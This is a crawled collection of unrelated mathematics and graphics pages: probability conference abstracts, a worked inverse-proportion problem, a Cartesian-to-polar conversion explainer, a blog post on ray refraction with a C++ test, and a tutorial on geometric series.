A typical application of probability to algorithms is to sample a randomly chosen subset of the data and make an inference about all the data with high probability. We discuss our recent algorithm of this flavour to compute approximations to a given matrix: given an $m \times n$ matrix A with entries between say -1 and 1, and an error parameter $a$ between 0 and 1, we find a matrix D which is the sum of at most $O(1/a^2)$ simple rank 1 matrices so that the sum of entries of any submatrix (among the $2^{m+n}$) of (A-D) is at most $amn$ in absolute value. Our algorithm takes time dependent only on $a$ and the allowed probability of failure (not on $m$, $n$). We draw on two lines of research to develop the algorithm: one is from the papers of Arora, Karger and Karpinski, Fernandez de la Vega, and most directly Goldwasser, Goldreich and Ron, who develop algorithms of this flavour for a set of graph problems, typical of which is the maximum cut problem. The second one is built around the fundamental Regularity Lemma of Szemerédi in graph theory. From the matrix approximation, the graph algorithms and the Regularity Lemma and several other results follow in a uniform way. We also generalize our approximations to multi-dimensional arrays and from that derive certain other algorithms.

Intae Jeon, Ohio State University
"Gelation Phenomena"

Our talk concerns the Smoluchowski coagulation-fragmentation equation, an infinite set of non-linear ordinary differential equations describing the evolution of a mono-disperse system of particles in a well-stirred solution. Using a stochastic approximation (more precisely, by approximating the solutions of the Smoluchowski equations by a sequence of finite Markov chains defined on a compact subset of $l_2$ space), we investigate the qualitative behavior of the solutions. Our talk includes the following: Consider the Smoluchowski coagulation equation

$$\dot{C}_t(j)=\frac{1}{2}\sum_{k=1}^{j-1}K(j-k,k)\,C_t(j-k)\,C_t(k)-\sum_{k=1}^{\infty}K(j,k)\,C_t(j)\,C_t(k),$$

$j=1,2,3,\cdots$, where $C_t(j)\geq 0$ is the expected number of $j$-clusters (a cluster consisting of $j$ particles) per unit volume, and $K$ is a nonnegative symmetric function which represents the coagulation rate of $i$- and $j$-clusters. Suppose $\epsilon (ij)^{\alpha} \leq K(i,j)\leq M(ij)^{\beta}$, where $\frac{1}{2}< \alpha\leq \beta<1$ and $\epsilon, M >0$. Then there exists a solution $C_t$ and $0\leq t_0<\infty$ such that $C_0(i)=\rho\,\delta_{1i}$ and $\sum_{i=1}^{\infty}iC_t(i)<\sum_{i=1}^{\infty}iC_0(i)=\rho$ for all $t> t_0$, i.e., the gelation phenomenon (also called the density dropping phenomenon, or the emergence of a giant cluster) occurs in finite time.

Harry Kesten, Cornell University
"Distinguishing and reconstructing sceneries from observations along random walk paths"

We discuss some results and some open problems of the following type: Let G be an infinite, connected, locally finite graph, and let $\xi$ and $\eta$ be maps from V to $\{0,1,\dots,k-1\}$, where V is the vertex set of G (such maps are called k-colorings or sceneries). Let $\{S_n\}$ be a random walk on G. Can we reconstruct $\xi$ if we observe the sequence $\{\xi(S_n)\}$?
If $\xi$ and $\eta$ are known and we observe either $\{\xi(S_n)\}$ or $\{\eta(S_n)\}$, but we are not told which of these alternatives prevails, can we decide (with zero probability of error) which of the two sequences was observed?

Steve Lalley, Purdue University
"Growth Processes on Trees: The Weak Survival Phase"

We will survey some recent results concerning two simple stochastic growth processes on the homogeneous tree of degree > 2: (1) the contact process; and (2) branching random walk. We will focus on the "weak survival" phase, in which the population grows exponentially but almost surely vacates every finite subset of the tree. We will discuss several questions of natural interest, including (i) the size of the "limit set" of the process; (ii) the asymptotic behavior of hitting probabilities; and (iii) the existence of interesting invariant measures.

Laszlo Lovasz, Yale University
"Mixing times for Markov chains"

In randomized algorithms solving a variety of computational tasks (approximate enumeration, volume computation, integration, simulated annealing, generation of contingency tables, etc.) the key element is to sample from a given distribution over a known but large and complicated set. The basic method is to construct an ergodic Markov chain with the given stationary distribution, and then run the chain for an appropriately large number of steps to get a state that has (approximately) the desired distribution. Mathematically, the main difficulty is to quantify "appropriately large", i.e., to estimate the "mixing time" of the chain. We may want to get close to the stationary distribution in different senses, and may have different starting conditions, leading to different notions of mixing time. It turns out that this variation in the notion of mixing time should not worry us too much: all these variations fall into a small number of classes, where mixing measures in the same class are within absolute constant factors of each other. This line of research was initiated by Aldous. Most of this is joint work with Peter Winkler, some with David Aldous and Andrew Beveridge.

Russell Lyons, Indiana U. (Bloomington) and IAS (Jerusalem)
"Random Spanning Forests"

The subject of random spanning forests began in 1991, growing out of random spanning trees, which have been studied (in some sense) since Kirchhoff in 1847. They have intimate connections to random walks and electric networks, as well as to harmonic Dirichlet functions. We will micro-survey the area and describe some highlights. See http://www.ma.huji.ac.il/~lyons/prbtree.html for a book in progress containing more details and http://ezinfo.ucs.indiana.edu/~rdlyons/ for my homepage.

Karin Nelander, Chalmers University of Technology and Gothenburg University
"Exact Sampling From Anti-monotone Systems"

A new approach to Markov chain Monte Carlo simulation was recently proposed by Propp and Wilson. This approach, unlike traditional ones, yields samples which have exactly the desired distribution. The Propp-Wilson algorithm requires this distribution to have a certain structure called monotonicity. In this talk, it is shown how the algorithm can be extended to the case where monotonicity is replaced by anti-monotonicity. As an illustrating example, simulations of the hard-core model are presented. This is joint work with Olle Haggstrom.
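For readers unfamiliar with the Propp-Wilson algorithm mentioned in this abstract and in Propp's talk below, here is a minimal Python sketch of monotone coupling-from-the-past for a toy chain (our own illustration, not Nelander's anti-monotone extension): a lazy reflecting walk on {0, ..., n}, whose stationary distribution is uniform.

```python
import random

def update(x, u, n):
    # Monotone update rule: x <= y implies update(x, u) <= update(y, u).
    return max(x - 1, 0) if u < 0.5 else min(x + 1, n)

def cftp(n, seed=0):
    rng = random.Random(seed)
    us = []        # shared randomness; us[k] drives the step at time -(k+1)
    T = 1
    while True:
        while len(us) < T:
            us.append(rng.random())
        lo, hi = 0, n                    # sandwiching trajectories
        for k in range(T - 1, -1, -1):   # run from time -T up to time 0
            lo = update(lo, us[k], n)
            hi = update(hi, us[k], n)
        if lo == hi:
            return lo                    # coalesced: an exact sample
        T *= 2                           # go further into the past, reusing us

print([cftp(10, seed=s) for s in range(8)])   # exact uniform samples
```

The key point, and the reason the same randomness list is reused as T doubles, is that the output is a sample from the chain run from the infinite past, hence exactly stationary, with no initialization bias.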
Boris Pittel Department of Mathematics, Ohio State University, Columbus, Ohio A phase transition phenomenon in the Erd\"os-R\'enyi random graph process The random graph process on $n$ vertices is the probability space of all the nested sequences of graphs $$G(n,0)\subset G(n,1)\subset\dots\subset G(n,N),$$ $N=\binom n2$, with vertex set $V=\{1,\dots,n\}$, such that $G(n,M)$ has $m$ edges, and each sample sequence has the same probability, $1/N!$. In particular, the random \lq\lq snapshot\rq\rq $G(n,m)$ is distributed uniformly on the set of all $\binom Nm$ graphs with $m$ edges. Alternatively, it is a Markov chain such that, given $G(n,m-1)$, the next graph $G(n,m)$ is obtained by adding a new edge whose location is chosen at random, uniformly among all $N-(m-1)$ still vacant sites. Erd\"os and R\'enyi undertook a first systematic study of this process back in 1960. Perhaps the most important result of their study was a discovery that, for $n$ large, the likely structure of $G(n,m)$ undergoes an abrupt change (phase transition) when $m$ passes through $n/2$. Namely, with high probability (whp), this a birth time of a giant component, that is a component of size of order $n$. Prior to this moment, the largest component is only of order $\log n$. Since then a lot of research effort has been spent on strengthening the original results and learning more about the likely evolution of the random graph, both before and after the birth of the giant component. The purpose of this talk is to survey some of the classic and more recent results and to stress the combinatorial-probabilistic techniques which were developed to obtain them. James Propp MIT "Coupling from the past: a user's guide" Coupling from the past is an approach to Monte Carlo that, when applicable, can completely eliminate initialization-bias, and sometimes requires only minor modifications to existing algorithms. I will give an overview of the method, describe the conditions under which it can be applied, and present three illustrative cases. For more on schemes that eliminate initialization-bias, see David Wilson's web-page on perfectly random sampling with Markov chains. Dana Randall Guarantees for Efficiently Sampling Lattice Configurations Simple Markov chains are often used to study large combinatorial sets. For instance, if we want to sample 3-colorings on some finite three-dimensional lattice region L, we let the state space of the Markov chain be the set of proper three colorings. Then, starting with some 3-coloring, we can iteratively update the configuration by recoloring at most one vertex at a time so as to move to another proper coloring. Closely related algorithms based on local updates are used to generate random configurations for various combinatorial problems on lattices, such as tilings, Eulerian orientations and alternating sign matrices. In each case, we will argue that the natural Markov chains are rapidly mixing'' (which guarantees that we can generate samples in polynomial time). We accomplish this be a two-step process. First, we use a very simple coupling scheme to argue that related Markov chains based on non-local moves are rapidly mixing. Then we use decomposition'' and clustering'' techniques to bound the mixing rate of the the original Markov chains in terms of the mixing rates of the non-local chains. The decomposition technique, which is work with Neal Madras, relates the mixing rate of a Markov chain to smaller chains derived from a decomposition of the state space. 
The clustering technique, which is work with Prasad Tetali, allows us to relate the mixing rates of the local and non-local chains. This is based on the comparison method of Diaconis and Saloff-Coste.

Gesine D. Reinert Department of Mathematics, University of California, Los Angeles Coupling Constructions for Normal Approximations with Stein's Method Coupling constructions for Poisson approximation using the Chen-Stein method are now a standard technique; a systematic study of related couplings for normal approximation using Stein's method began only a few years ago. This small survey of coupling methods for normal approximations includes size-bias couplings, which are natural for nonnegative random variables such as counts, and zero-bias couplings, which may be applied to mean-zero variables and are especially useful for variates with vanishing third moments.

Alistair Sinclair University of California at Berkeley "Quadratic dynamical systems" are a natural class of non-linear stochastic processes that are used to model various phenomena in the natural sciences, such as population genetics and the kinetic theory of ideal gases. Less classically, they also provide an appropriate framework for the study of genetic algorithms for combinatorial optimization. In contrast to linear systems, which are well understood, there is little general theory available for the quantitative analysis of quadratic systems. In this talk, I will present several fundamental properties of the large class of symmetric quadratic systems acting on populations over a fixed set of types. I will go on to describe an analysis of some particular examples, including crossover systems in population genetics and a natural system defined on populations over the set of matchings in a tree. In particular, it will turn out that convergence to the limit in these systems is very rapid. This demonstrates that such systems, though non-linear, are sometimes amenable to analysis. I will also outline some of the main challenges for future work in this area. Most of the results mentioned in the talk are joint work with Yuval Rabani, Yuri Rabinovich and Avi Wigderson.

Georgia Tech Isoperimetric invariants for product Markov chains We introduce new isoperimetric constants for Markov chains (and graphs) using the notion of a "discrete gradient." We derive bounds on these constants for the Cartesian product of Markov chains. Specializing our result to the hypercube, we derive a certain connectivity theorem of Margulis-Talagrand. Several intriguing questions on Cheeger-type inequalities remain open. (This is joint work with Christian Houdré.)

David Wilson University of California - Berkeley Generating random spanning trees This talk will survey known algorithms for generating random spanning trees of graphs (directed and undirected). These include algorithms based on linear algebra and algorithms based on random walks. The loop-erased random walk algorithm (the "cycle-popping" algorithm), which in addition to being very efficient has also been a useful conceptual tool in the study of random spanning trees on certain infinite graphs, will be presented. Details can be found in the article How to Get a Perfectly Random Sample From a Generic Markov Chain and Generate a Random Spanning Tree of a Directed Graph by the speaker and James Propp. Also see the speaker's web page on perfectly random sampling with Markov chains.

Peter Winkler Bell Labs Ramsey Theory and Sequences of Random Variables joint work with W.T.
Trotter, ASU We begin with the following odd lemma: for any sequence of events A_1,...,A_n there are i < j such that Pr(A_i and not A_j) < 1/4 + o(1). Generalization in three directions leads to: (1) A combinatorial problem involving shift graphs; (2) The answer to a question of Brightwell and Scheinerman concerning fractional dimension of interval orders; and (3) A finite form of de Finetti's Theorem which jettisons the exchangeability hypothesis.

David Zuckerman Extractors and their Applications In this talk, I will survey extractors and their applications. An extractor is a procedure to extract randomness from a defective random source, using some additional truly random bits. Extractors have seemingly unrelated applications, such as using few random bits to do random sampling and randomized space-bounded computation, and constructing expander graphs that beat the eigenvalue bound.
2014-04-23 23:24:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8079969882965088, "perplexity": 547.2000743173548}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1398223203841.5/warc/CC-MAIN-20140423032003-00355-ip-10-147-4-33.ec2.internal.warc.gz"}
https://socratic.org/questions/suppose-that-the-time-it-takes-to-do-a-job-is-inversely-proportional-to-the-numb
# Suppose that the time it takes to do a job is inversely proportional to the number of workers. That is, the more workers on the job the less time required to complete the job. If it takes 2 workers 8 days to finish a job, how long will it take 8 workers? $8$ workers will finish the job in $2$ days. Let the number of workers be $w$ and the number of days required to finish the job be $d$. Then $w \propto \frac{1}{d}$, i.e. $w = k \cdot \frac{1}{d}$, or $w \cdot d = k$, where $k$ is a constant. With $w = 2$ and $d = 8$ we get $k = 2 \cdot 8 = 16$, so the equation for the job is $w \cdot d = 16$. For $w = 8$: $d = \frac{16}{w} = \frac{16}{8} = 2$ days. $8$ workers will finish the job in $2$ days. [Ans]
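The worker-days bookkeeping can be double-checked numerically; a minimal sketch in Python (variable names are illustrative):

```python
# Inverse proportion: workers * days = k, a constant number of worker-days.
w1, d1 = 2, 8      # 2 workers take 8 days
k = w1 * d1        # k = 16 worker-days for the whole job
w2 = 8             # now 8 workers
d2 = k / w2        # days required by 8 workers
print(d2)          # 2.0
```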
2019-12-06 06:23:43
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 8, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8731549978256226, "perplexity": 1576.246987612857}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540484815.34/warc/CC-MAIN-20191206050236-20191206074236-00117.warc.gz"}
https://wumbo.net/examples/convert-cartesian-to-polar-coordinates/
Convert Cartesian to Polar Coordinates This example shows how to convert a point from the Cartesian Coordinate System to the Polar Coordinate System. The general conversion is given by the two equations below: $r = \sqrt{x^2 + y^2}$ and $\theta = \tan^{-1}(y/x)$. Convert Cartesian to Polar Example For example, to convert a cartesian point to polar coordinates, first we solve for the hypotenuse length of the right triangle to find the length of the radius. Then we use the arctangent function to find the angle. The cartesian point is equivalent to the corresponding polar point. Note, if the same calculation is performed with a calculator set to degrees instead of radians, the angle of the point is reported in degrees. (Figure: the right triangle formed by both points.) Explanation Both systems describe the position of a point in space. A point in the Polar Coordinate System is defined in terms of a radius and an angle: $(r, \theta)$. A point in the Cartesian Coordinate System is defined in terms of an $x$ and a $y$ component: $(x, y)$. Both define the point relative to the origin of the system. (Figure: the right triangle relating the two descriptions.) The Pythagorean theorem relates the squared sides of a right triangle. Since the $x$ component corresponds to the adjacent side of the right triangle and the $y$ component corresponds to the opposite side, the equation can be rearranged to give the length of the hypotenuse, which corresponds to the length of the radius in a polar coordinate. The arctangent function returns the angle of a right triangle given the ratio of its opposite side over its adjacent side.
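A small numeric sketch of the conversion in Python (the point (3, 4) is just an illustration, not the article's example):

```python
import math

x, y = 3.0, 4.0               # an illustrative Cartesian point
r = math.hypot(x, y)          # sqrt(x^2 + y^2), the radius
theta = math.atan2(y, x)      # angle in radians; atan2 picks the right quadrant
print(r, theta)               # 5.0, ~0.9273 rad
print(math.degrees(theta))    # ~53.13, the same angle with a calculator in degrees
```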
2022-08-15 05:58:33
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9164940714836121, "perplexity": 126.28303233161601}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572161.46/warc/CC-MAIN-20220815054743-20220815084743-00036.warc.gz"}
http://vertexwahn.de/2020/04/11/refraction/
I think a good way to get started with ray tracing is to begin with refraction. This is a basic operation that happens in almost every ray tracer. Refraction happens when a light ray hits another medium, as shown in the following image. Of course, this is just a simplified model of how light travels through space and how light is modeled, but this is fine enough to render some pleasant pictures. According to Snell's law, the following equation holds:

$$\eta = \frac{\sin(\alpha)}{\sin(\beta)} = \frac{n_2}{n_1}$$

The index of refraction in vacuum is $1.0$ and for some glass material it might be, for instance, $1.6$. Assuming that $n_1 = 1.0$ and $n_2 = 1.6$, we can compute for a given incident ray the direction of the refracted ray. E.g. if $\alpha = 45°$ (angle of incidence), the corresponding angle $\beta$ (angle of refraction) will be approximately $26.23°$. The refractive index is defined as $n = \frac{c}{v}$, where $c$ is the speed of light in vacuum and $v$ is the speed of light in the corresponding medium. Total internal reflection describes the behavior that beyond some angle (starting at the critical angle) no light is refracted and all of it is reflected instead. Total internal reflection is the reason for Fata Morganas, e.g. a wet-looking road on a hot day.

### Critical Angle

The critical angle at which total internal reflection starts can be computed using this formula:

$$\theta_c = \sin^{-1}\left(\frac{n_2}{n_1}\right)$$

Total internal reflection only happens if $n_1 > n_2$ holds, which means it does not happen if we go from an optically "sparser" medium to an optically "denser" medium.

### Examples

The following table lists some examples for a 2D scenario where we have an incident ray coming from "above" and hitting the interface between two different media.

| Case | Normalized normal vector | $\alpha$ | Incident vector | Refraction index medium 1 | Refraction index medium 2 | Expected $\beta$ | Expected normalized refracted vector |
|------|--------------------------|----------|-----------------|---------------------------|---------------------------|------------------|--------------------------------------|
| A | (0, 1) | $45°$ | (-1, 1) | 1 | 1.6 | 26.23° | (0.441975594, -0.897027075) |
| B | (0, 1) | $0°$ | (0, -1) | 1 | 1.6 | 0° | (0, -1) |
| C | (0, 1) | $45°$ | (-1, 1) | 1.6 | 1 | Not available (total internal reflection) | Not available (total internal reflection) |

### A test-driven development approach to implement ray refraction

According to test-driven development, we first write a test before starting with the implementation. Thomas Willberger, founder, CEO and realtime rendering developer at Enscape3D, once wrote in a tweet: "Software wisdom: Start with the best-debuggable, most simple implementation. Iron out early mistakes and add tests BEFORE adding bells and whistles. It's invaluable to know that the core part works and you do not have to suspect the whole codebase when hunting a bug."

Let's write a test for a refract function. First we have to think about a proper design. The refract function expects three input parameters: $\omega_i$, $n$ (a normal vector) and $\eta$. $\omega_i$ is the vector that points in the opposite direction of the incident vector. This is a common convention: $\omega_i$ always points towards the light source direction. So to say, $\omega_i$ is the negative direction of the incoming light. $n$ is the normal vector that points towards the direction from which the incoming ray originates. $\eta$ is the ratio of the two refraction indices, where $n_1$ is the refraction index of the medium from which the incoming ray is coming (the test below passes $\eta = n_1 / n_2$). As an output parameter, the refract function is expected to compute the refracted vector, if there is no total internal reflection.
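Before writing a test it helps to reproduce the expected values in the table independently; a quick check of Snell's law and the critical angle (a sketch, not the post's code):

```python
import math

alpha = math.radians(45.0)   # angle of incidence, Case A
n1, n2 = 1.0, 1.6            # vacuum -> glass

# Snell's law: n1 * sin(alpha) = n2 * sin(beta)
beta = math.asin(math.sin(alpha) * n1 / n2)
print(math.degrees(beta))    # ~26.23 degrees, as in the table

# Critical angle for the reverse direction (glass -> vacuum, n1 > n2):
print(math.degrees(math.asin(1.0 / 1.6)))   # ~38.68 degrees
```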
When looking at the source code of PBRT, the refraction function has four parameters:

inline bool Refract(const Vector3f &wi, const Normal3f &n, Float eta, Vector3f *wt)

PBRT uses the fourth parameter as an output parameter for the computed refracted vector. PBRT has the convention that pointers are always used for output parameters. Furthermore, the function returns true if there was no total internal reflection. I decided to use a similar form for my refraction function. Instead of using a pointer for the computed refracted vector, I decided to use a reference. This is the test I came up with after several iterations:

TEST(RefractionVacuumToGlass, When_IncidentVectorIs45Degrees_Then_RefratedVectorIsAbout26Degrees) {
    // Arrange
    const Normal2f normal(0.0f, 1.0f);
    Vector2f incident(1.0f, -1.0f);
    Vector2f wi = -incident;
    wi.normalize();
    const auto refractionIndexVacuum = 1.0f;
    const auto refractionIndexGlass = 1.6f;

    // Act
    Vector2f refractedDirection;
    bool validRefraction = refract(wi, normal, refractionIndexVacuum / refractionIndexGlass, refractedDirection);

    // Assert
    EXPECT_TRUE(validRefraction);
    EXPECT_TRUE(refractedDirection.x() > 0.0f);
    EXPECT_TRUE(refractedDirection.y() < 0.0f);
    EXPECT_THAT(refractedDirection.norm(), ::testing::FloatEq(1.0f));
}
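For reference, the refraction math that this test exercises can be written out in a few lines. This is a hedged Python sketch of the same convention (wi points toward the light, eta = n1/n2); the 2D-tuple representation and the names are illustrative, not the post's C++ API:

```python
import math

def refract(wi, n, eta):
    """wi: unit vector toward the light; n: unit normal on the incoming side;
    eta = n1 / n2. Returns the unit refracted direction, or None when total
    internal reflection occurs."""
    cos_i = wi[0] * n[0] + wi[1] * n[1]
    sin2_t = eta * eta * max(0.0, 1.0 - cos_i * cos_i)
    if sin2_t >= 1.0:
        return None                      # total internal reflection (Case C)
    cos_t = math.sqrt(1.0 - sin2_t)
    k = eta * cos_i - cos_t
    return (-eta * wi[0] + k * n[0], -eta * wi[1] + k * n[1])

s = 1.0 / math.sqrt(2.0)
print(refract((-s, s), (0.0, 1.0), 1.0 / 1.6))  # ~(0.4419, -0.8970), Case A
print(refract((-s, s), (0.0, 1.0), 1.6 / 1.0))  # None, Case C
```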
2020-07-12 18:56:43
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.44747912883758545, "perplexity": 1210.6474601680204}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657139167.74/warc/CC-MAIN-20200712175843-20200712205843-00200.warc.gz"}
https://17calculus.com/infinite-series/geometric-series/
For a discussion of geometric sequences, see the page on sequences. A main application of a geometric series is to build power series. See also: WikiBooks - Geometric Series.

### Geometric Series Quick Breakdown

| Question | Answer |
|----------|--------|
| used to prove convergence | yes |
| used to prove divergence | yes |
| can be inconclusive | no |
| can find convergence value | yes |
| useful for | finding power series |
Geometric series are an important type of series that you will come across while studying infinite series. This series type is unusual because not only can you easily tell whether a geometric series converges or diverges but, if it converges, you can calculate exactly what it converges to. This is extremely unusual for an infinite series. Let's break down what this theorem is saying and how we can use it.

Geometric Series Convergence: A series in the form $$\displaystyle{ \sum_{n=0}^{\infty}{r^n}}$$ is called a Geometric Series with ratio $$r$$. If $$0 \lt |r| \lt 1$$ it converges; if $$|r| \geq 1$$ it diverges.

Series Convergence Value: If the geometric series converges, it converges to $$\displaystyle{\frac{1}{1-r}}$$. This is usually written $$\displaystyle{ \sum_{n=0}^{\infty}{r^n} = \frac{1}{1-r}, ~~ 0 \lt |r| \lt 1 }$$.

How To Use The Geometric Series

A geometric series looks like $$\displaystyle{ \sum_{n=0}^{\infty}{ r^n } }$$ where r is an expression of some sort, not containing n. If you can get your series into this form using algebra, then $$r$$ will tell you whether the series converges or diverges. If $$|r| \geq 1$$, then the series diverges. If $$|r| < 1$$, then the series converges and it converges to $$\displaystyle{\frac{1}{1-r}}$$.

Notes
1. r is called the ratio.
2. The absolute values on r to determine convergence or divergence are absolutely critical. Do not drop them unless you are sure that r is positive all the time. If you are not sure, keeping them is always correct.
3. Watch out! Be careful to notice that the series given above starts with index $$n=0$$. When determining the convergence value, make sure you take that into account and adjust your series to exactly match this one, including the starting index value of zero.

Finite Geometric Series

In the following discussion, we are assuming that $$0 < r < 1$$. The equation for the value of a finite geometric series is $$\displaystyle{ \sum_{n=0}^{k}{r^n} = \frac{1-r^{k+1}}{1-r} ~~~~~ (1) }$$ where $$k$$ is a finite positive integer.

Problem: Show that the above formula holds for $$k=1, k=2$$ and $$k=3$$.

Solution: Let $$k=1$$.
$$\displaystyle{ \sum_{n=0}^{1}{r^n} = r^0 + r^1 = 1+r }$$ If we substitute $$k=1$$ into the right side of equation $$(1)$$, factor and simplify, we get $$\displaystyle{ \frac{1-r^{1+1}}{1-r} = \frac{1-r^2}{1-r} = \frac{(1+r)(1-r)}{1-r} = 1+r }$$ So we have shown that the equation holds for $$k=1$$. Let's try $$k=2$$, going through the same steps. $$\displaystyle{ \sum_{n=0}^{2}{r^n} = r^0 + r^1 + r^2 = 1+r+r^2 }$$ If we substitute $$k=2$$ into the right side of equation $$(1)$$, factor and simplify, we get $$\displaystyle{ \frac{1-r^{1+2}}{1-r} = \frac{1-r^3}{1-r} = \frac{(1+r+r^2)(1-r)}{1-r} = 1+r+r^2 }$$ It works again. How about for $$k=3$$? Let $$k=3$$. $$\displaystyle{ \sum_{n=0}^{3}{r^n} = r^0 + r^1 + r^2 + r^3 = 1+r+r^2+r^3 }$$ This time, if we set up the right side of equation $$(1)$$, the factoring is getting a little more complicated. So let's work backwards and start with $$1+r+r^2+r^3$$ and try to get the right side of equation $$(1)$$. To do this we multiply by $$(1-r)/(1-r)$$.

$$\displaystyle{ (1+r+r^2+r^3)\frac{1-r}{1-r} = \frac{(1+r+r^2+r^3)-r(1+r+r^2+r^3)}{1-r} = \frac{1+r+r^2+r^3 -r - r^2 - r^3 - r^4}{1-r} = \frac{1-r^4}{1-r} }$$

Notice that all the inside terms cancel and we are left with $$1-r^4$$ in the numerator.

Derivation

In this section, we will derive equation (1). Let $$\displaystyle{ S_n = \sum_{k=0}^{n}{r^k} = 1+r+r^2+r^3+ \dots + r^n }$$ Multiplying this by $$r$$ gives us $$rS_n = r + r^2 + r^3 + \dots + r^n + r^{n+1}$$ Now we subtract $$rS_n$$ from $$S_n$$ to get $$S_n - rS_n = (1+ r + r^2 + r^3 + \dots + r^n) - (r+r^2+r^3+ \dots + r^n + r^{n+1})$$ Looking closely at the terms on the right side of the equal sign, we can see that all the terms cancel except for $$1-r^{n+1}$$. So now we have $$S_n-rS_n = 1-r^{n+1}$$. Now we solve for $$S_n$$. $$\begin{array}{rcl} S_n-rS_n & = & 1-r^{n+1} \\ S_n(1-r) & = & 1-r^{n+1} \\ S_n & = & \displaystyle{ \frac{1-r^{n+1}}{1-r} } \end{array}$$ $$\displaystyle{ \sum_{k=0}^{n}{r^k} = \frac{1-r^{n+1}}{1-r} }$$ [qed]

This video shows a geometric series applied to a financial equation. The application of calculus to finances is not covered on this site, but you may find this video helpful if you are in business calculus. (Video: Krista King Math - Financial Application of Geometric Series [9min-49secs].)

### Practice

Instructions: Unless otherwise instructed, for each of the following series, 1. determine whether it converges or diverges, using the geometric series test, if possible; 2. if it converges, determine what it converges to (if possible). Give your answers in exact form.

Basic Problems

$$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{3}{4^n} } }$$ Answer: the series converges to 4 by the Geometric Series Test.
Solution: There is a geometric series hidden here. First key: if there is a constant in a series, pull it outside the sum. This will often simplify the problem so that you can see it more clearly. After you do that, you get $$\displaystyle{ a_n = \frac{1}{4^n} }$$ Now, since there is a one in the numerator, you can rewrite this as $$\displaystyle{ a_n = \frac{1^n}{4^n} = \left( \frac{1}{4} \right)^n }$$ You can now see that you have $$\left|r\right|=1/4 < 1$$, so the series converges by the geometric series test. Additionally, we can determine that it converges to $$\displaystyle{ \frac{3}{1-(1/4)} = \frac{3}{3/4} = 4 }$$

$$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{2^n}{e^n} } }$$ Answer: converges to $$\displaystyle{\frac{2}{e-2}}$$ by the Geometric Series Test. Solution: Convergence or divergence: since we have the same power in the numerator and denominator, we can combine them to get $$\displaystyle{ \frac{2^n}{e^n} = \left( \frac{2}{e} \right)^n }$$ Now we can see that we have a geometric series with $$\left|r\right|=2/e < 1$$, so the series converges. Convergence value: when determining only convergence or divergence, you don't need to worry about the starting n-value, but you do need to consider it when determining what a series converges to. Notice in the definition of a geometric series, n starts at zero; in this series, n starts at one. So we need to take that into account when determining what it converges to. This means, for this problem, we need to subtract 1 (because when $$n=0$$, the term is 1; this is not always the case, so you need to determine this in each problem). $$\displaystyle{ \frac{1}{1-(2/e)} - 1 = \frac{e}{e-2} - \frac{e-2}{e-2} = \frac{2}{e-2} }$$

